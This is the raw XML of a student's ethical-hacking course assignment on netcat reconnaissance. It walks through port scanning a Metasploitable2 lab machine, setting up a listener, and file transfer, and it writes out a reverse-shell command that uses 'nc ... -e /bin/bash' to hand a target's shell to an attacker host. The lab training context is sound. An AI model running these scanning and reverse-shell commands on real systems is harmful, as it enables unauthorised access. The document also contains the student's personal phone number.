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251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-795655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2169160" cy="2169160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Picture 1" descr="A logo with a person in a hoodie using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person in a hoodie using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512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4472C4"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>MISSION HACKERS</w:t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FFC000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>BANGLADESH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56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment No-06 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32"/>
          <w:szCs w:val="10"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="10"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"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Assignment Title: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance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Course Title: Cybersecurity &amp; Ethical Hacking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olor w:val="2F5496"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="8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by: 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Name: Istiak Alam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Phone: 01765376101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Submission Date: 25-07-25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10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Tools Task / Topic: File Transfer using Netcat  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10"/>
        <w:rPr/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         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>between two device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40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to: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MD Sha Jalal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Founder of Mission Hackers Bangladesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5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Active Reconnaissance : Netcat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What we can do using netcat..?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Port Scanning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Banner Grabbing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File Transfer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Remote Shell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Chat / messaging Tool in terminal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To Start netcat open terminal and run :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Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -help </w:t>
      </w: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for tool manual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SYNOPSIS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  <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nc [-options] hostname port[s] [ports]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nc -l -p port [-options] [hostname] [port]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There two kind of shell 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1. Reverse Shell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2. Bind Shell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Start with setting up host and target and Scan the target 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Step 1 : Open any virtual machine and turn on metaslpoitable2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Step 2 : For scanning the vulnerable machine port, get the IP and start scanning from Netcat.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295275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4912360" cy="34563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Step 3 : For port scanning, open terminal in host system and type : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nc -zv 192.168.0.105 1-1000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5731510" cy="34683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Step 4 : Lets Connect to the web server : first we have to turn on listening mode in the Attacker device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nc -lvnp 4444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then send Netcat request from the target device and connect with target system </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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5731510" cy="21971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Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nc 192.168.0.107 4444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We can communicate with the Target device from our host / attacker Device.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Step 5 : For getting access of the target system shell we have to send reverse shell command from the Target zombie device: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Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nc 192.168.0.107 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack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5731510" cy="32238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Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack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We Just Get the reverse shell from the target device and execute shell commands there…!!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Now if want to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>send a file to the target device</w:t>
      </w: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 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In Attacker device Execute : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacked.txt nc -l -p 1234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In Target Device Execute : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.0.107 1234 &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hacked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.tx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>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-83820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>405765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="16135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ack">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Hack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/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1065"/>
        </w:tabs>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1425"/>
        </w:tabs>
        <w:ind w:left="1425" w:hanging="360"/>
      </w:pPr>
      <w:rPr/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360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2145"/>
        </w:tabs>
        <w:ind w:left="2145" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2505"/>
        </w:tabs>
        <w:ind w:left="2505" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2865"/>
        </w:tabs>
        <w:ind w:left="2865" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3225"/>
        </w:tabs>
        <w:ind w:left="3225" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="3585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7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Calibri Light" w:hAnsi="Calibri Light" w:eastAsia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Calibri Light" w:hAnsi="Calibri Light" w:eastAsia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0"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0" w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman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Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496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3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts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qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading6Char" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading7Char" w:customStyle="1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="595959"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading8Char" w:customStyle="1">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading9Char" w:customStyle="1">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="272727"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont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2F5496"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseQuoteChar" w:customStyle="1">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color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/>
      <w:spacing w:val="5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Bengal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Bengal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Bengal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Bengali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80"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia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/>
    <w:rPr>
      <w:rFonts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LibreOffice/25.2.3.2$Linux_X86_64 LibreOffice_project/520$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>4</Pages>
  <Words>301</Words>
  <Characters>1445</Characters>
  <CharactersWithSpaces>1782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2025-07-11T06:38:00Z</dcterms:created>
  <dc:creator>Istiaq Alam</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-25T21:45:45Z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